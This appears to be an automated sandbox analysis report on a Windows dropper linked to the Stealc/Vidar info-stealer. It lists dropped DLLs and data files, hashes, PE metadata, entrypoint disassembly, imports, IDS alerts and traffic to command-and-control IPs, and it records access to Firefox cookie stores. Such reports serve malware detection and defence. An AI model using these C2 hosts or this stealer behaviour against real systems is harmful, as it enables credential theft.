Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u5mc.3.exe

Download File

Process:	C:\Users\user\Desktop\QPoX60yhZt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4681633056351355
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNtdwBCswSb5:zXD944WlLZMM6YFH/+5
MD5:	8A1840466A024D501165ECE6851ED51A
SHA1:	D4CB4C8D00968B39563F5696DC2FC6446CE01E9F
SHA-256:	B115F5F1D175CF9C29E291D111466BC323D01EA8EF72C60606A875DA22314738
SHA-512:	A3CBC5B87856B157F55849CF13857DC36D7A03C636536FC4132A5B81C3C4CD843EFF9C7915B3190F4FBF110CF63C8DD4460B412660285202DED6128DDDA2E47E
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~E^.................................................................................................................................................................................................................................................................................................................................................k.I.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.299080263702208
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QPoX60yhZt.exe
File size:	415'233 bytes
MD5:	96b085b3f6ee7441236cee54161309d0
SHA1:	88cf7eaf5db9a625a4fd922afe4c851abdd86b0b
SHA256:	132d0526eda9bdadbb2b402d44738d4fc91255556325b6a1991e053d1710fcce
SHA512:	23950cddb7d72685c12102438f1f38668a9206a4f5e3a0273558f4b7a2260183144e5f504d30d0659971b578a68de25b500b210217c17523b903d581f5085067
SSDEEP:	12288:hOatvTLg/5HI+WnM93ss5WAlYjGJqMh8nbwr5:hjM5HsnMNmtSchnbwr5
TLSH:	AC94F10236DDD0F1E06787721934FA120A3EFC719E9089773398264E5D74ED0AB667BA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................q.......N.......O.......=.............X/K.......u.....X/p.....Rich............................PE..L....Xcc...

File Icon


Icon Hash:	412559514149510d

Static PE Info

General

Entrypoint:	0x404457
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x636358C5 [Thu Nov 3 05:59:33 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fee2e01e9ecb27c28da2b6fc37f265e9

Entrypoint Preview

Instruction
call 00007FAC0D2ADD72h
jmp 00007FAC0D2A7EF5h
push 00000014h
push 00417FD8h
call 00007FAC0D2AB168h
call 00007FAC0D2ADF43h
movzx esi, ax
push 00000002h
call 00007FAC0D2ADD05h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007FAC0D2A7EF6h
xor ebx, ebx
jmp 00007FAC0D2A7F25h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007FAC0D2A7EDDh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007FAC0D2A7ECFh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007FAC0D2A7EFBh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007FAC0D2AA33Fh
test eax, eax
jne 00007FAC0D2A7EFAh
push 0000001Ch
call 00007FAC0D2A7FD1h
pop ecx
call 00007FAC0D2A98F2h
test eax, eax
jne 00007FAC0D2A7EFAh
push 00000010h
call 00007FAC0D2A7FC0h
pop ecx
call 00007FAC0D2ADD7Eh
and dword ptr [ebp-04h], 00000000h
call 00007FAC0D2AC121h
test eax, eax
jns 00007FAC0D2A7EFAh
push 0000001Bh
call 00007FAC0D2A7FA6h
pop ecx
call dword ptr [004120B0h]
mov dword ptr [04045E84h], eax
call 00007FAC0D2ADD99h
mov dword ptr [004583ECh], eax
call 00007FAC0D2AD956h
test eax, eax
jns 00007FAC0D2A7EFAh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x183e4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c46000	0xd891	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c54000	0x1380	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x121f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x178f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10035	0x10200	221640873457fa0e5d5c63923ab9077a	False	0.6008206153100775	data	6.679301665085145	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x6c72	0x6e00	476a3e3c8cf77fb8b48424f5e6405a68	False	0.38881392045454544	data	4.715553293392299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x3c2ce88	0x3f400	9aff686ba9f746b97342040d5e22de5d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c46000	0xd891	0xda00	f040f0a2b66f230a2ae83afe0349002d	False	0.5132955848623854	data	5.506341447859309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c54000	0x1380	0x1400	5a3f6d3b7048859af1798c9d118bd88d	False	0.7474609375	data	6.464277324244391	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x3c464e4	0xe	data	1.5714285714285714
RT_ICON	0x3c464f4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5660980810234542
RT_ICON	0x3c4739c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5487364620938628
RT_ICON	0x3c47c44	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.6177745664739884
RT_ICON	0x3c481ac	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4616182572614108
RT_ICON	0x3c4a754	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4873358348968105
RT_ICON	0x3c4b7fc	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.494672131147541
RT_ICON	0x3c4c184	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.44858156028368795
RT_ICON	0x3c4c5ec	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4240405117270789
RT_ICON	0x3c4d494	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4833032490974729
RT_ICON	0x3c4dd3c	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5835253456221198
RT_ICON	0x3c4e404	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4913294797687861
RT_ICON	0x3c4e96c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4701244813278008
RT_ICON	0x3c50f14	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4878048780487805
RT_ICON	0x3c51fbc	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.5032786885245901
RT_ICON	0x3c52944	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5514184397163121
RT_STRING	0x3c52dac	0x2bc	data	0.49142857142857144
RT_STRING	0x3c53068	0x2ac	data	0.48830409356725146
RT_GROUP_ICON	0x3c53314	0x68	data	0.6923076923076923
RT_GROUP_ICON	0x3c5337c	0x76	data	0.6779661016949152
RT_VERSION	0x3c533f4	0x23c	data	0.5367132867132867
RT_MANIFEST	0x3c53630	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators	0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GlobalMemoryStatus, GetLocaleInfoA, LocalCompact, InterlockedDecrement, GetComputerNameW, CreateHardLinkA, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, GetUserDefaultLangID, SetCommState, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, SetCalendarInfoW, GetExitCodeThread, AddAtomW, CreateEventW, GlobalFindAtomW, GetOEMCP, LoadLibraryExA, VirtualProtect, GetConsoleProcessList, GetTempPathA, GetVolumeInformationW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetStringTypeW, LoadLibraryExW, OutputDebugStringW, LCMapStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, CreateFileW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-10:26:56.207351	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/26/24-10:27:02.662958	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49733	185.172.128.76	192.168.2.4
04/26/24-10:27:01.406784	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49733	80	192.168.2.4	185.172.128.76
04/26/24-10:27:01.961415	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49733	80	192.168.2.4	185.172.128.76
04/26/24-10:27:02.310581	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49733	185.172.128.76	192.168.2.4
04/26/24-10:27:02.312846	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49733	80	192.168.2.4	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 10:26:52.136567116 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 10:26:55.967030048 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 10:26:56.206949949 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 10:26:56.207220078 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 10:26:56.207350969 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 10:26:56.447289944 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 10:26:58.481426954 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 10:26:58.482387066 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 10:26:58.493956089 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 10:26:58.734191895 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 10:26:58.734385014 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 10:26:58.734523058 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 10:26:58.974400043 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 10:26:58.974783897 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 10:26:58.975684881 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 10:26:58.988035917 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.228497982 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.228682995 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.228759050 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.469147921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.469929934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.469974041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470012903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470027924 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.470052004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470091105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470097065 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.470129013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470166922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470179081 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.470204115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470241070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470247030 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.470278978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.470316887 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710361958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710426092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710464954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710506916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710544109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710562944 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710581064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710602045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710621119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710630894 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 10:26:59.710660934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710696936 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 10:26:59.710705042 CEST	49732	80	192.168.2.4	185.172.128.59
